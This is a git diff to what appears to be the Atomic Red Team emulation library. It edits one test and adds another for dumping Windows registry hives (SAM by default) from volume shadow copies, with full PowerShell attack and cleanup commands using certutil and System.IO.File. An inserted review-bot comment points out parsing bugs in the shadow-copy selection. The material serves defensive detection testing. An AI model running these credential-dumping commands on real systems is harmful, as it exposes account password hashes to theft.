diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 55fa2871..e9380dbe 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -76,7 +76,8 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
-credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 3f7d3f9e..3a96f7e7 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -52,7 +52,8 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
-credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
+credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 8aa3bf01..12dbc257 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -122,7 +122,8 @@
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
- - Atomic Test #5: dump volume shadow copy hive with certutil [windows]
+ - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
+ - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index a5799b2d..a3558cd7 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -90,7 +90,8 @@
- Atomic Test #2: Registry parse with pypykatz [windows]
- Atomic Test #3: esentutl.exe SAM copy [windows]
- Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows]
- - Atomic Test #5: dump volume shadow copy hive with certutil [windows]
+ - Atomic Test #5: dump volume shadow copy hives with certutil [windows]
+ - Atomic Test #6: dump volume shadow copy hives with System.IO.File [windows]
- T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 74487a9b..4cfe28ae 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -5440,19 +5440,23 @@ credential-access:
Invoke-PowerDump
name: powershell
elevation_required: true
- - name: dump volume shadow copy hive with certutil
+ - name: dump volume shadow copy hives with certutil
auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
description: |
- Dump the SAM hive from volume shadow copies with the certutil utility
+ Dump hives from volume shadow copies with the certutil utility
This can be done with a non-admin user account
supported_platforms:
- windows
input_arguments:
- file_path:
+ dump_path:
description: Path where the hive will be dumped
type: Path
default: "$ENV:temp"
- file_name:
+ target_hive:
+ description: Hive you wish to dump
+ type: String
+ default: SAM
+ dumped_hive:
description: Name of the dumped hive
type: String
default: myhive
@@ -5462,13 +5466,48 @@ credential-access:
$shadowlist = get-wmiobject win32_shadowcopy
$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
- $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
- certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+ $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+ certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
name: powershell
elevation_required: false
cleanup_command: |
write-host ""
- $toremove = #{file_path} + "\" + '#{file_name}'
+ $toremove = #{dump_path} + "\" + '#{dumped_hive}'
+ rm $toremove
+ - name: dump volume shadow copy hives with System.IO.File
+ auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+ description: 'Dump hives from volume shadow copies with System.IO.File
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ dump_path:
+ description: Path where the hive will be dumped
+ type: Path
+ default: "$ENV:temp"
+ target_hive:
+ description: Hive you wish to dump
+ type: String
+ default: SAM
+ dumped_hive:
+ description: Name of the dumped hive
+ type: String
+ default: myhive
+ executor:
+ command: |
+ write-host ""
+ $shadowlist = get-wmiobject win32_shadowcopy
+ $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+ $maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+ $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+ $mydump = #{dump_path} + '\' + '#{dumped_hive}'
+ [System.IO.File]::Copy($shadowpath , $mydump)
+ name: powershell
+ elevation_required: false
+ cleanup_command: |-
+ write-host ""
+ $toremove = #{dump_path} + "\" + '#{dumped_hive}'
rm $toremove
T1555.002:
technique:
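Review bot: The shadow copy selection in both executors is fragile: `$shadowcopy.DeviceObject[-1]` keeps only the last character of the device name, so any shadow copy numbered 10 or higher is mis-identified and `$shadowpath` points at the wrong (or a non-existent) volume, and when no shadow copies exist `$volumenumbers` appears to be empty and the path silently degrades to one with no volume number; parsing the trailing number as an integer, e.g. `$volumenumbers = foreach($shadowcopy in $shadowlist){[int]($shadowcopy.DeviceObject -replace '^.*ShadowCopy','')}`, and failing early when the list is empty would make the test deterministic. The new System.IO.File variant also differs from the certutil one in that `[System.IO.File]::Copy($shadowpath , $mydump)` throws if `#{dumped_hive}` already exists, so a re-run without cleanup fails where `certutil -f` overwrites; `[System.IO.File]::Copy($shadowpath, $mydump, $true)` would keep the two tests consistent. Because `#{dump_path}` is spliced unquoted into `$mydump = #{dump_path} + '\' + '#{dumped_hive}'` (and into the cleanup `$toremove`), the input only works when supplied as a PowerShell expression such as the default `$ENV:temp`; the `dump_path` description should say so, or the command should quote the value. Note that the test #5 entry being edited begins in the preceding hunk, and the same executor lines are repeated in the generated T1003.002.md hunk under `## Atomic Test #6`.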
diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md
index 80948108..27f223f3 100644
--- a/atomics/T1003.002/T1003.002.md
+++ b/atomics/T1003.002/T1003.002.md
@@ -32,7 +32,9 @@ Notes:
- [Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames](#atomic-test-4---powerdump-registry-dump-of-sam-for-hashes-and-usernames)
-- [Atomic Test #5 - dump volume shadow copy hive with certutil](#atomic-test-5---dump-volume-shadow-copy-hive-with-certutil)
+- [Atomic Test #5 - dump volume shadow copy hives with certutil](#atomic-test-5---dump-volume-shadow-copy-hives-with-certutil)
+
+- [Atomic Test #6 - dump volume shadow copy hives with System.IO.File](#atomic-test-6---dump-volume-shadow-copy-hives-with-systemiofile)
@@ -209,8 +211,8 @@ Invoke-PowerDump
-## Atomic Test #5 - dump volume shadow copy hive with certutil
-Dump the SAM hive from volume shadow copies with the certutil utility
+## Atomic Test #5 - dump volume shadow copy hives with certutil
+Dump hives from volume shadow copies with the certutil utility
This can be done with a non-admin user account
**Supported Platforms:** Windows
@@ -225,8 +227,9 @@ This can be done with a non-admin user account
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| file_path | Path where the hive will be dumped | Path | $ENV:temp|
-| file_name | Name of the dumped hive | String | myhive|
+| dump_path | Path where the hive will be dumped | Path | $ENV:temp|
+| target_hive | Hive you wish to dump | String | SAM|
+| dumped_hive | Name of the dumped hive | String | myhive|
#### Attack Commands: Run with `powershell`!
@@ -237,14 +240,61 @@ write-host ""
$shadowlist = get-wmiobject win32_shadowcopy
$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
-$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM"
-certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2
+$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2
```
#### Cleanup Commands:
```powershell
write-host ""
-$toremove = #{file_path} + "\" + '#{file_name}'
+$toremove = #{dump_path} + "\" + '#{dumped_hive}'
+rm $toremove
+```
+
+
+
+
+
+
+
+
+## Atomic Test #6 - dump volume shadow copy hives with System.IO.File
+Dump hives from volume shadow copies with System.IO.File
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9d77fed7-05f8-476e-a81b-8ff0472c64d0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dump_path | Path where the hive will be dumped | Path | $ENV:temp|
+| target_hive | Hive you wish to dump | String | SAM|
+| dumped_hive | Name of the dumped hive | String | myhive|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+write-host ""
+$shadowlist = get-wmiobject win32_shadowcopy
+$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]}
+$maxvolume = ($volumenumbers | Sort-Object -Descending)[0]
+$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}"
+$mydump = #{dump_path} + '\' + '#{dumped_hive}'
+[System.IO.File]::Copy($shadowpath , $mydump)
+```
+
+#### Cleanup Commands:
+```powershell
+write-host ""
+$toremove = #{dump_path} + "\" + '#{dumped_hive}'
rm $toremove
```